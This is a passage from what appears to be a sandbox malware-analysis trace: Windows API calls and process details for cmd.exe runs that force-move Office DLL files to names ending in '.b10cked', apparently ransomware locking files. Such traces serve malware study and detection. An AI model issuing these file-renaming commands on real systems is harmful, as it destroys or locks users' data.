lpBuffer=0x2ef920, lpFilePart=0x2ef91c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef91c*="Desktop") returned 0x18 [0172.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.989] FindClose (in: hFindFile=0x4909f0 | out: hFindFile=0x4909f0) returned 1 [0172.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.990] FindClose (in: hFindFile=0x4909f0 | out: 
hFindFile=0x4909f0) returned 1 [0172.990] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.990] FindClose (in: hFindFile=0x4909f0 | out: hFindFile=0x4909f0) returned 1 [0172.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.990] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.990] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.990] GetEnvironmentStringsW () returned 0x490210* [0172.990] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.990] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.991] GetConsoleOutputCP () returned 0x1b5 [0172.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.991] GetUserDefaultLCID () returned 0x409 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa60, cchData=128 | out: lpLCData="0") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa60, cchData=128 | out: lpLCData="0") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa60, cchData=128 | out: lpLCData="1") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.992] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.993] GetConsoleTitleW (in: lpConsoleTitle=0x480930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.993] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.994] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.994] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.994] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.994] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.994] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.994] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.997] GetConsoleTitleW (in: lpConsoleTitle=0x2ef758, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0172.997] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.997] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.997] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.997] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.997] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.998] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.998] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.998] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.998] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.998] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.998] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.998] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.998] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.998] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.000] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef514, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef50c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef50c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.000] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.001] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.001] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0173.001] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 
66 [0173.001] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~1.trx")) returned 0x2020 [0173.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x491f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2eee9c, lpFilePart=0x2eee84 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", lpFilePart=0x2eee84*="PUB6IN~1.TRX") returned 0x3c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.002] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.002] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0173.002] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0173.002] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~1.trx")) returned 0x2020 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2ef318, lpFilePart=0x2ef0b0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", lpFilePart=0x2ef0b0*="PUB6IN~1.TRX") returned 0x3c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef520, lpFilePart=0x2ef0b0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x2ef0b0*="PUB6INTL.DLL.trx_dll.b10cked") returned 0x4c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.003] SetLastError (dwErrCode=0x0) [0173.003] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.003] GetLastError () returned 0x2 [0173.003] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2eea2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea2c) returned 0x492130 [0173.003] FindNextFileW (in: hFindFile=0x492130, lpFindFileData=0x2eea2c | out: lpFindFileData=0x2eea2c) returned 0 [0173.003] GetLastError () returned 0x12 [0173.003] FindClose (in: hFindFile=0x492130 | out: hFindFile=0x492130) returned 1 [0173.005] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x491cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491cc0) returned 0x492130 [0173.005] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2eecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0173.005] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2eecc4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0173.005] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll")) returned 0x2020 [0173.005] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.006] FindClose (in: hFindFile=0x492130 | out: hFindFile=0x492130) returned 1 [0173.006] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eec78 | out: _Buffer=" 1") returned 9 [0173.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.006] GetFileType (hFile=0x7) returned 0x2 [0173.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eec04 | out: lpMode=0x2eec04) returned 1 [0173.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eec38 | out: lpConsoleScreenBufferInfo=0x2eec38) returned 1 [0173.086] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.087] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eec78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x2eec5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eec5c*=0x1a) returned 1 [0173.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.087] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.087] SetConsoleInputExeNameW () returned 0x1 [0173.087] GetConsoleOutputCP () returned 0x1b5 [0173.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.088] exit (_Code=0) Process: id = "300" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23549 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23550 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23551 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23552 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 23553 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23554 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23555 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23556 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23557 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23558 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23634 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23635 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23636 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23637 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 23638 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 23639 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23640 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23641 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23642 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23643 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23644 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23645 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23646 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23647 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23648 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23649 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23650 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23651 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 23652 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23653 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 23654 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 23655 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 23656 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 23657 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x00000000011e0000" filename = "" Thread: id = 399 os_tid = 0x2ac [0173.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f89c | out: lpSystemTimeAsFileTime=0x28f89c*(dwLowDateTime=0x9d0b9660, dwHighDateTime=0x1d440a9)) [0173.050] GetCurrentProcessId () returned 0x958 [0173.050] GetCurrentThreadId () returned 0x2ac [0173.050] GetTickCount () returned 0x32673 [0173.050] QueryPerformanceCounter (in: lpPerformanceCount=0x28f894 | out: lpPerformanceCount=0x28f894*=22983902523) returned 1 [0173.050] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.050] __set_app_type (_Type=0x1) [0173.050] __p__fmode () returned 0x76b331f4 [0173.050] __p__commode () returned 0x76b331fc [0173.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.051] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.051] GetCurrentThreadId () returned 0x2ac [0173.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2ac) returned 0x38 [0173.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f82c | out: phkResult=0x28f82c*=0x0) returned 0x2 [0173.051] VirtualQuery (in: lpAddress=0x28f863, 